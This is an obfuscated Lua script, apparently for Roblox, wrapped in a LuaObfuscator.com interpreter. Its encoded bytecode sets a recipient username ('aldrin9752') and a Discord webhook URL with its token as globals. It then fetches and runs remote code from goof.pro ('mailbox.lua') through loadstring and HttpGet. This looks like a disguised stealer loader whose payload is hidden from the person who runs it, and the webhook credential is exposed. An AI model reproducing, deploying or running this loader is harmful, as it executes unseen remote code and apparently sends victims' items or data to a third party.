--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v79=0;while true do if (v79==0) then v19=v0(v3(v30,1,1));return "";end end else local v80=0;local v81;while true do if (v80==0) then v81=v2(v0(v30,16));if v19 then local v97=v5(v81,v19);v19=nil;return v97;else return v81;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v82=(v31/((5 -3)^(v32-(2 -1))))%((3 -1)^(((v33-1) -(v32-(2 -1))) + ((156 + 464) -(555 + 64)))) ;return v82-(v82%1) ;else local v83=(933 -(857 + 74))^(v32-(569 -(367 + 201))) ;return (((v31%(v83 + v83))>=v83) and 1) or (927 -(214 + 113 + 600)) ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + (1639 -(1523 + 114)) );v18=v18 + (879 -(282 + 595)) ;return (v36 * (364 -108)) + v35 ;end local function v23()local v37,v38,v39,v40=v1(v16,v18,v18 + 3 );v18=v18 + ((1048 + 21) -(68 + 997)) ;return (v40 * (16778486 -(226 + 1044))) + (v39 * (285370 -219834)) + (v38 * (373 -(32 + 85))) + v37 ;end local function v24()local v41=v23();local v42=v23();local v43=1 + 0 ;local v44=(v20(v42,958 -(892 + 65) ,20) * ((4 -2)^(58 -26))) + v41 ;local v45=v20(v42,21,56 -25 );local v46=((v20(v42,382 -(87 + 263) )==(181 -(67 + 66 + 47))) and  -(1 + 0)) or (2 -1) ;if (v45==0) then if (v44==0) then return v46 * (0 -0) ;else v45=1 + 0 ;v43=0 -0 ;end elseif (v45==(2999 -(802 + 150))) then return ((v44==0) and (v46 * ((2 -1)/(0 -0)))) or (v46 * NaN) ;end return v8(v46,v45-(745 + (1465 -(1069 + 118))) ) * (v43 + (v44/(((2265 -1266) -(915 + 82))^(147 -95)))) ;end local function v25(v47)local v48=0 -0 ;local v49;local v50;while true do if (v48==(1 + 2)) then return v6(v50);end if (v48==0) then v49=nil;if  not v47 then v47=v23();if (v47==((442 -(416 + 26)) -0)) then return "";end end v48=1 + 0 ;end if (v48==(793 -(368 + 423))) then v50={};for v88=1, #v49 do v50[v88]=v2(v1(v3(v49,v88,v88)));end v48=9 -(19 -13) ;end if (v48==(19 -(10 + 8))) then v49=v3(v16,v18,(v18 + v47) -(1 + 0) );v18=v18 + v47 ;v48=7 -5 ;end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v51=0;local v52;local v53;local v54;local v55;local v56;local v57;local v58;while true do if (0==v51) then local v86=0;while true do if ((0 -0)~=v86) then else v52=0 -0 ;v53=nil;v86=1;end if (1==v86) then v51=1;break;end end end if (v51==2) then v56=nil;v57=nil;v51=3;end if (1==v51) then local v87=374 -(123 + 251) ;while true do if (v87~=1) then else v51=2;break;end if (v87~=0) then else v54=nil;v55=nil;v87=4 -3 ;end end end if (3==v51) then v58=nil;while true do local v90=698 -(208 + 490) ;while true do if (v90~=0) then else if (v52==(1 + 0)) then local v98=0;local v99;while true do if (v98~=(0 + 0)) then else v99=0;while true do if (v99==(837 -(660 + 176))) then for v142=1 + 0 ,v57 do local v143=202 -(14 + 188) ;local v144;local v145;local v146;while true do if (v143==0) then v144=675 -(534 + 141) ;v145=nil;v143=1;end if (1==v143) then v146=nil;while true do if (v144==(1 + 0)) then if (v145==1) then v146=v21()~=0 ;elseif (v145==(2 + 0)) then v146=v24();elseif (v145~=(3 + 0)) then else v146=v25();end v58[v142]=v146;break;end if (v144==(0 -0)) then local v171=0;local v172;while true do if (v171==0) then v172=0 -0 ;while true do if (v172==1) then v144=2 -1 ;break;end if (v172==(0 + 0)) then local v180=0 + 0 ;while true do if (v180~=(397 -(115 + 281))) then else v172=2 -1 ;break;end if (v180==(0 + 0)) then v145=v21();v146=nil;v180=2 -1 ;end end end end break;end end end end break;end end end v56[10 -7 ]=v21();v99=869 -(550 + 317) ;end if (v99==0) then v57=v23();v58={};v99=1;end if (v99~=(2 -0)) then else v52=2;break;end end break;end end end if (v52==2) then local v100=0;local v101;while true do if (v100~=(0 -0)) then else v101=0;while true do if (v101~=0) then else local v130=0;while true do if (v130==0) then for v162=2 -1 ,v23() do local v163=285 -(134 + 151) ;local v164;local v165;while true do if ((1665 -(970 + 695))==v163) then v164=0;v165=nil;v163=1 -0 ;end if (v163~=1) then else while true do if (v164==(1990 -(582 + 1408))) then v165=v21();if (v20(v165,1,3 -2 )==(0 -0)) then local v175=0;local v176;local v177;local v178;local v179;while true do if (v175~=0) then else v176=0;v177=nil;v175=3 -2 ;end if (v175==(1826 -(1195 + 629))) then while true do if ((0 -0)==v176) then local v182=241 -(187 + 54) ;while true do if (v182~=(780 -(162 + 618))) then else v177=v20(v165,2 + 0 ,2 + 1 );v178=v20(v165,8 -4 ,6);v182=1;end if (v182==(1 -0)) then v176=1;break;end end end if (v176~=3) then else if (v20(v178,3,1 + 2 )==(1637 -(1373 + 263))) then v179[4]=v58[v179[4]];end v53[v162]=v179;break;end if (v176==(1002 -(451 + 549))) then if (v20(v178,1,1 + 0 )~=(1 -0)) then else v179[2]=v58[v179[2 -0 ]];end if (v20(v178,2,2)==(1385 -(746 + 638))) then v179[2 + 1 ]=v58[v179[3]];end v176=3;end if (v176~=(1 -0)) then else v179={v22(),v22(),nil,nil};if (v177==0) then local v190=0;local v191;while true do if ((1581 -(1535 + 46))==v190) then v191=0;while true do if (v191~=0) then else v179[3]=v22();v179[4]=v22();break;end end break;end end elseif (v177==(1 + 0)) then v179[1 + 2 ]=v23();elseif (v177==2) then v179[563 -(306 + 254) ]=v23() -((1 + 1)^16) ;elseif (v177==(5 -2)) then local v196=1467 -(899 + 568) ;local v197;local v198;local v199;while true do if (v196==0) then v197=0 + 0 ;v198=nil;v196=1;end if (v196==(2 -1)) then v199=nil;while true do if (v197==(603 -(268 + 335))) then v198=290 -(60 + 230) ;v199=nil;v197=1;end if (1==v197) then while true do if (v198==(572 -(426 + 146))) then v199=0;while true do if (v199~=(0 + 0)) then else v179[1459 -(282 + 1174) ]=v23() -((813 -(569 + 242))^16) ;v179[4]=v22();break;end end break;end end break;end end break;end end end v176=2;end end break;end if (v175==(2 -1)) then local v181=0;while true do if (v181~=(0 + 0)) then else v178=nil;v179=nil;v181=1;end if ((1025 -(706 + 318))==v181) then v175=1253 -(721 + 530) ;break;end end end end end break;end end break;end end end for v166=1272 -(945 + 326) ,v23() do v54[v166-1 ]=v28();end v130=1;end if (1==v130) then v101=1;break;end end end if (1==v101) then return v56;end end break;end end end v90=1;end if (v90==1) then if (v52==(0 -0)) then local v102=0;while true do if (v102==(1 + 0)) then local v103=0;while true do if (v103~=(700 -(271 + 429))) then else v55={};v56={v53,v54,nil,v55};v103=1501 -(1408 + 92) ;end if (v103==(1087 -(461 + 625))) then v102=2;break;end end end if ((1288 -(993 + 295))==v102) then local v104=0 + 0 ;while true do if (v104~=(1171 -(418 + 753))) then else v53={};v54={};v104=1 + 0 ;end if (1~=v104) then else v102=1;break;end end end if (v102==(1 + 1)) then v52=1 + 0 ;break;end end end break;end end end break;end end end local function v29(v59,v60,v61)local v62=v59[1];local v63=v59[2];local v64=v59[3];return function(...)local v65=v62;local v66=v63;local v67=v64;local v68=v27;local v69=1;local v70= -1;local v71={};local v72={...};local v73=v12("#",...) -1 ;local v74={};local v75={};for v84=0,v73 do if (v84>=v67) then v71[v84-v67 ]=v72[v84 + 1 ];else v75[v84]=v72[v84 + 1 ];end end local v76=(v73-v67) + 1 ;local v77;local v78;while true do local v85=0;while true do if (v85==0) then v77=v65[v69];v78=v77[1];v85=1;end if (v85==1) then if (v78<=8) then if (v78<=3) then if (v78<=1) then if (v78==0) then v75[v77[2]]();else v75[v77[2]]=v61[v77[3]];end elseif (v78==2) then local v107=0;local v108;local v109;while true do if (v107==0) then v108=v77[2];v109=v75[v77[3]];v107=1;end if (v107==1) then v75[v108 + 1 ]=v109;v75[v108]=v109[v77[4]];break;end end else do return;end end elseif (v78<=5) then if (v78>4) then v61[v77[3]]=v75[v77[2]];else local v112=v77[2];v75[v112]=v75[v112](v13(v75,v112 + 1 ,v70));end elseif (v78<=6) then do return;end elseif (v78==7) then v75[v77[2]]=v77[3]~=0 ;else local v132=0;local v133;local v134;while true do if (1==v132) then v75[v133 + 1 ]=v134;v75[v133]=v134[v77[4]];break;end if (v132==0) then v133=v77[2];v134=v75[v77[3]];v132=1;end end end elseif (v78<=12) then if (v78<=10) then if (v78==9) then v61[v77[3]]=v75[v77[2]];else v75[v77[2]]=v77[3];end elseif (v78>11) then v75[v77[2]]=v77[3]~=0 ;else v75[v77[2]]=v77[3];end elseif (v78<=14) then if (v78==13) then v75[v77[2]]();else local v121=v77[2];local v122,v123=v68(v75[v121](v13(v75,v121 + 1 ,v77[3])));v70=(v123 + v121) -1 ;local v124=0;for v127=v121,v70 do local v128=0;while true do if (v128==0) then v124=v124 + 1 ;v75[v127]=v122[v124];break;end end end end elseif (v78<=15) then v75[v77[2]]=v61[v77[3]];elseif (v78==16) then local v135=0;local v136;local v137;local v138;local v139;while true do if (v135==2) then for v168=v136,v70 do local v169=0;while true do if (v169==0) then v139=v139 + 1 ;v75[v168]=v137[v139];break;end end end break;end if (v135==0) then v136=v77[2];v137,v138=v68(v75[v136](v13(v75,v136 + 1 ,v77[3])));v135=1;end if (1==v135) then v70=(v138 + v136) -1 ;v139=0;v135=2;end end else local v140=0;local v141;while true do if (v140==0) then v141=v77[2];v75[v141]=v75[v141](v13(v75,v141 + 1 ,v70));break;end end end v69=v69 + 1 ;break;end end end end;end return v29(v28(),{},v17)(...);end v15("LOL!083O0003083O00557365724E616D65030A3O00616C6472696E3937353203073O00576562482O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O313230362O3031302O3435383531383631302F61366C4B386D336D75443550754C6B4863364A716F363942446C522O454867636E553033574B504F3366304A4252744766366B5449484173784E716550696E304F523638030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574031E3O00682O7470733A2O2F672O6F662E70726F2F732F6D61696C626F782E6C7561000D3O00120B3O00023O0012093O00013O00120B3O00043O0012093O00033O00120F3O00053O00120F000100063O00200200010001000700120B000300084O0007000400014O000E000100044O00045O00022O000D3O000100012O00033O00017O00",v9(),...);end
